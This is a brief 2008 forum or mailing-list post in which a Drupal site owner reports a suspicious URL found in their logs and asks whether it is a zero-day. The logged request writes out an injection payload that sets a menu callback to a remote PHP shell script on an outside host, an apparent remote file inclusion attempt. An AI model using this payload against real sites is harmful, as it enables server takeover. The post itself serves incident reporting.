6 Jan
2008
6 Jan
'08
7:17 p.m.
Hi, I have see this url into my watchdog logs: drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt? <http://www.ziobudda.net/rilasciato_drupal_6_beta1/drupal/?_menu%5Bcallbacks%5D%5B1%5D%5Bcallback%5D=http://my3dwork.com/images/on.txt?> where http://my3dwork.com/images/on.txt <http://www.ziobudda.net/rilasciato_drupal_6_beta1/drupal/?_menu%5Bcallbacks%5D%5B1%5D%5Bcallback%5D=http://my3dwork.com/images/on.txt?> is a php shell script. any 0-day bug ? I have tried to exec it on my site without "drupal/" and the result is that the browser is redirect to the homepage. M.